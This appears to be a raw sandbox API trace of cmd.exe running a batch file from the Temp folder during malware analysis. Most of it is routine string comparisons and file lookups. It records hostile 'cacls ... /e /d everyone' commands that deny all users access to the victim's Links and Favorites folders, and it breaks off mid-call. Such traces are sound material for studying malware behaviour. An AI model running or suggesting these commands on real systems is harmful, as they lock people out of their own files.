[0035.664] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.664] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.664] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.664] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.664] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.664] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.664] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.664] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.664] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.664] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.664] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.664] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.664] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.664] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.664] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.664] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.664] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.664] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.664] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.664] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.664] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.664] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.664] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.664] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.664] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.664] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.664] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.664] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.664] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.664] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.664] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.664] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.664] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.664] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.664] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.664] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.664] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.664] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.664] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.664] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.664] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.664] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.664] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.664] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.664] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.664] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.664] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.664] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.664] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.664] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.664] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.664] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.664] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.664] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.664] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.664] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.665] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.665] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.665] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.665] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.665] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.665] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.665] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.665] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0035.665] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0035.665] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0035.665] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.665] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.665] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.665] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.665] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.665] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.665] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.665] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.665] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.665] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.665] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.665] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.665] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.665] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.665] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.665] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.665] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.665] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.665] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.665] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.665] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.665] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.665] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.665] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.665] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.665] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.665] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.665] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.665] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.665] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.665] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.665] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.665] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.665] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.665] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.665] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.665] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.665] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.665] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.665] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.665] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.665] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.665] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.666] SetErrorMode (uMode=0x0) returned 0x0 [0035.666] SetErrorMode (uMode=0x1) returned 0x0 [0035.666] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0035.666] SetErrorMode (uMode=0x0) returned 0x1 [0035.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.666] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.666] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.666] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.666] GetLastError () returned 0x2 [0035.666] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.666] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.666] GetLastError () returned 0x2 [0035.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.666] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.666] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.666] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.666] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.667] SetErrorMode (uMode=0x0) returned 0x0 [0035.667] SetErrorMode (uMode=0x1) returned 0x0 [0035.667] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0035.667] SetErrorMode (uMode=0x0) returned 0x1 [0035.667] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.667] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.667] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.667] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.667] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.667] GetLastError () returned 0x2 [0035.667] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18640 [0035.667] FindClose (in: hFindFile=0xd18640 | out: hFindFile=0xd18640) returned 1 [0035.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.667] GetLastError () returned 0x2 [0035.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18640 [0035.667] FindClose (in: hFindFile=0xd18640 | out: hFindFile=0xd18640) returned 1 [0035.667] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.667] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.667] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.668] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.668] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.668] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.668] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.668] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.668] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Links\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\5JgHKoaOfdp\\Links\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Links\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0xb60, dwThreadId=0xb64)) returned 1 [0035.685] CloseHandle (hObject=0x8c) returned 1 [0035.685] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.685] GetEnvironmentStringsW () returned 0xd1b020* [0035.685] FreeEnvironmentStringsA (penv="=") returned 1 [0035.685] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.685] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0035.685] _close (_FileHandle=4) returned 0 [0035.685] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0035.737] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.737] CloseHandle (hObject=0x80) returned 1 [0035.738] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0035.781] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.781] CloseHandle (hObject=0x94) returned 1 [0035.782] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.782] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.782] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.782] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.782] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.782] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.782] SetConsoleInputExeNameW () returned 0x1 [0035.782] GetConsoleOutputCP () returned 0x1b5 [0035.782] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.782] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.782] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.783] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.783] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.783] SetFilePointer (in: hFile=0x94, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0035.783] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0035.783] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x751, lpOverlapped=0x0) returned 1 [0035.783] SetFilePointer (in: hFile=0x94, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0035.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n=%%i\r\n") returned 65 [0035.783] GetFileType (hFile=0x94) returned 0x1 [0035.783] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.783] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0035.783] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.784] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.784] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.784] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.784] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.784] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.784] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.784] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.784] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0035.784] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0035.784] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0035.784] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0035.784] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0035.784] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0035.784] _tell (_FileHandle=3) returned 862 [0035.784] _close (_FileHandle=3) returned 0 [0035.784] _pipe (in: _PtHandles=0xd25fd8, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25fd8) returned 0 [0035.784] _dup (_FileHandle=1) returned 5 [0035.784] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0035.784] _close (_FileHandle=4) returned 0 [0035.784] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.784] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.784] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.784] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.784] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.784] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.784] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.784] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.784] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.784] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.784] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.784] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.785] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.785] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.785] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.785] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.785] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.785] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.785] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.785] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.785] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.785] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0035.785] SetErrorMode (uMode=0x0) returned 0x0 [0035.785] SetErrorMode (uMode=0x1) returned 0x0 [0035.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18270, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0035.785] SetErrorMode (uMode=0x0) returned 0x1 [0035.785] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0035.785] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.785] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.785] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd183b0 [0035.785] FindClose (in: hFindFile=0xd183b0 | out: hFindFile=0xd183b0) returned 1 [0035.785] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0035.785] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0035.785] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.786] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.786] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.786] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.786] _wcsnicmp 